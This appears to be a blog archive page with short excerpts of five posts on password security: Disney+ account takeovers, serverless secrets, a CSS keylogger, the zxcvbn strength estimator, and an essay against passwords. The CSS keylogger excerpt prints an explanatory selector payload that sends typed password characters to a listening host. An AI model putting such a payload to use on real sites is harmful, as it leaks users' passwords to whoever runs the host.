Princesses make terrible passwords

From the Firefox Blog: When the Disney+ streaming service rolled out, millions of people flocked to set up accounts. And within a week, thousands of poor unfortunate souls reported that their Disney passwords were hacked. According to media reports, some Disney+ account holders have lost their account access while hackers have sold their logins online. […]

Secrets in Serverless

Good post on how and where to store your secrets when working in a Serverless / Cloud Environment — something I was wondering about myself a little while ago Serverless applications and cloud functions often need to communicate with an upstream API or service. Perhaps they require a username and password to connect to a […]

CSS Keylogger (and why you shouldn’t worry about it)

Leveraging CSS attribute selectors it – in theory – is possible to write a keylogger in pure CSS. The selector below for example targets all input[type=”password”] elements whose last character is an a: input[type=”password”][value$=”a”] { background-image: url(“http://localhost:3000/a”); } The theory goes that whenever a user presses the a character inside an input[type=”password”], a request to […]

zxcvbn: realistic password strength estimation

Simplistic strength estimation gives bad advice. Without checking for common patterns, the practice of encouraging numbers and symbols means encouraging passwords that might only be slightly harder for a computer to crack, and yet frustratingly harder for a human to remember. zxcvbn, named after a crappy password, is a JavaScript password strength estimation library. Use […]

Kill the Password: Why a String of Characters Can’t Protect Us Anymore

Mat Honan, who’s digital life was destroyed this summer, on passwords The age of the password has come to an end; we just haven’t realized it yet. And no one has figured out what will take its place. What we can say for sure is this: Access to our data can no longer hinge on […]